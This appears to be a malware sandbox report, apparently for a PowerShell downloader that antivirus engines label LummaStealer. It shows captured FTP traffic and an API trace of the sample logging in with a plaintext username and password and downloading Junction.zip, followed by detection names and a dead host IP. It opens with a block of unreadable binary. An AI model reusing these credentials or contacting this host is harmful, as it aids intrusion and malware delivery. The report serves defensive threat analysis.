]--öøÌ8â“eŸm¶Â8ƒU<6ß~©G‰ÛqçjÁe"¢Ó£ªuɨ]8T…ÖSڝÓt¹±¥Û^·GvYñ(¬ÂžúÚ´OG¿êˆɕ¶¨Vɑîâ·Êwä/½ˆ?îpúoWCÍA¿+Ïî(Jxãòª¡äM‘×óïÏ^w½6}sþÞ£KºK‡oí*ZS>µ¬ùÁ¤ÛÄ»ôg¥_?·ˆ:C[ŽÿzV^yoþ҇²O/šYM…UۊEO?=õ|ãùÁúãÂéï"ß>«lúhYóùcʛ«¯£J½eÔ&|?0rN>ÓcÚa’gédsÞ8ŽýM9Ø;­7¾7jä«ò)Bf~§LAá5%²aF¿Ok EP¿ÅnϦµ»ò®Œ¹æ>ÆûQðOÿ wm?ÐR›{v}ôxùéõ··)?”Âû.kÝßMØ9v/K‡»‰ZŠ1¢±é‡1¡h”¸DÞ©š»¸%{¾õyñ uÚmÄæ–K–×Z·‹Î׸‹ðð˪ÒO²Hô{óhë…~#™‘~?jGè²Òý³_´Êœ­^!Q#AO7¥ß!ÁÄ7^±îõRÓW&'tú=üdB\¤XåŒyà1ùH›@½H>lð•Ö‹}G ÄhÙ*ù‡a¯ÞÀ^£nLßú¡ ™ƒÒX¹ZQ´«| ‡–Ãä1Ñ12sixOrσl‰ªW‰\a††ûßeŒ,éÊé®é#RŒV âé±Í¦õßëBÛý[€â4{
Data received 226 Transfer complete.
Data sent USER AstroVision
Data sent PASS Ve!0mh16
Data sent OPTS utf8 on
Data sent PWD
Data sent CWD /Scripts/
Data sent TYPE I
Data sent PASV
Data sent RETR Junction.zip
Time & API Arguments Status Return Repeated

send

buffer: USER AstroVision
socket: 1572
sent: 18
1 18 0

send

buffer: PASS Ve!0mh16
socket: 1572
sent: 15
1 15 0

send

buffer: OPTS utf8 on
socket: 1572
sent: 14
1 14 0

send

buffer: PWD
socket: 1572
sent: 5
1 5 0

send

buffer: CWD /Scripts/
socket: 1572
sent: 15
1 15 0

send

buffer: TYPE I
socket: 1572
sent: 8
1 8 0

send

buffer: PASV
socket: 1572
sent: 6
1 6 0

send

buffer: RETR Junction.zip
socket: 1572
sent: 19
1 19 0
Lionic Trojan.Script.PowerShell.4!c
CTX powershell.trojan.lummastealer
ALYac Trojan.Agent.GNVQ
VIPRE Trojan.Agent.GNVQ
Arcabit Trojan.Agent.GNVQ
Symantec Trojan.Gen.MBT
ESET-NOD32 PowerShell/TrojanDownloader.Agent.KTB
Avast Script:SNH-gen [Trj]
BitDefender Trojan.Agent.GNVQ
MicroWorld-eScan Trojan.Agent.GNVQ
Emsisoft Trojan.Agent.GNVQ (B)
DrWeb PowerShell.DownLoader.2269
FireEye Trojan.Agent.GNVQ
Google Detected
Kingsoft Win32.Troj.Undef.a
Microsoft Trojan:PowerShell/LummaStealer.DRS!MTB
GData Trojan.Agent.GNVQ
Varist ABTrojan.VQQZ-
AhnLab-V3 Downloader/Powershell.LummaC2.SC227430
Ikarus Trojan-Downloader.PowerShell.Agent
Tencent Win32.Trojan-Downloader.Downloader.Fwnw
huorong Trojan/Generic!B10ECCEC160C1D8B
AVG Script:SNH-gen [Trj]
dead_host 167.86.109.19:33518